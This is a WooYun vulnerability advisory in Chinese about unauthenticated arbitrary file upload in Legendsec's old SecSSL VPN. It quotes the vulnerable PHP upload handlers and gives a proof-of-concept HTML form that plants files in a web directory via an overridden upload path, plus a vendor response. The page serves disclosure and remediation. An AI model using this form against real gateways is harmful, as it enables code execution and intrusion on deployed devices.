当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170017

漏洞标题:网神某网关设备2个任意代码执行漏洞(无需登录)

相关厂商:网神信息技术(北京)股份有限公司

漏洞作者: 路人甲

提交时间:2016-01-15 10:19

修复时间:2016-04-11 16:08

公开时间:2016-04-11 16:08

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-14: 细节向核心白帽子及相关领域专家公开
2016-03-24: 细节向普通白帽子公开
2016-04-03: 细节向实习白帽子公开
2016-04-11: 细节向公众公开

简要描述:

网神旧版SecSSL VPN产品

详细说明:

存在漏洞的文件

/admin/account/user_add_action.php
/admin/account/user_edit_action.php
/admin/account/huge_user_edit_step1_action.php
/admin/account/admin_add_action.php
重复一处


这三个文件的部分漏洞代码为:
0x1 /admin/account/user_add_action.php(/admin/account/admin_add_action.php类似)

if (($authServerUserFlag == 4) || ($authServerUserFlag == 5) || ($auth_type == 4)) {
if ($_FILES['certificate_file']['error'] == UPLOAD_ERR_OK) {
if(isset($_POST["zip_cb"]))
$userId = 1;
$file_size = $_FILES['certificate_file']['size'];
$file_type = $_FILES['certificate_file']['type'];

$temp_name = $_FILES['certificate_file']['tmp_name'];
$gw_file_name = $_FILES['certificate_file']['name'];
$gw_file_name = str_replace("\\","",$gw_file_name);
$gw_file_name = str_replace("'","",$gw_file_name);
$gw_file_name = str_replace(" ","",$gw_file_name);
$file_path = $CFG_UPLOAD_PATH.$gw_file_name;
//File Name Check
if ( $gw_file_name == "" ) {
include "include/error.php";
return;
}


0x2 /admin/account/huge_user_edit_step1_action.php

if (($auth_type == 4) || ($auth_type == 5)) {
if ($_FILES['certificate_file']) {
$file_size = $_FILES['certificate_file']['size'];
$file_type = $_FILES['certificate_file']['type'];

$temp_name = $_FILES['certificate_file']['tmp_name'];
$gw_file_name = $_FILES['certificate_file']['name'];
$gw_file_name = str_replace("\\","",$gw_file_name);
$gw_file_name = str_replace("'","",$gw_file_name);
$gw_file_name = str_replace(" ","",$gw_file_name);
$file_path = $CFG_UPLOAD_PATH.$gw_file_name;
$gw_file_name = $file_path;
$result= move_uploaded_file($temp_name, $file_path);
chmod($file_path, $CFG_UPLOAD_MOD);
}
}


根据上面的代码可以看出,对于文件的上传没有任何的限制,因此可直接上传任意文件

漏洞证明:

同样,保存如下代码为wooyun.htm

<form action="**.**.**.**/admin/account/user_add_action.php?CFG_UPLOAD_PATH=/ssl/www/admin/js/" method="post" enctype ="multipart/form-data"> 
<input name="certificate_file" type="file" />
<input name="auth_type" type="hidden" value="4"/>
<input type="submit" name="submit_post" value="pki_localca_import_addsave"/>
</form>


用浏览器打开该文件,修改host,直接上传即可:
漏洞大量存在,几乎是百发百中,给几个案例:

**.**.**.**/welcome_pop.php
https://**.**.**.**/welcome_pop.php

修复方案:

严格限制文件上传

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-19 22:39

厂商回复:

感谢白帽子的反馈,经过核实,网神早年旧版VPN的确存在PHP漏洞缺陷问题,网神新一代SSLVPN产品不受影响。由于现存的旧版VPN客户数量不多,网神内部会针对现存的旧版VPN客户逐一进行联系,提供系统升级或设备更换服务。

最新状态:

暂无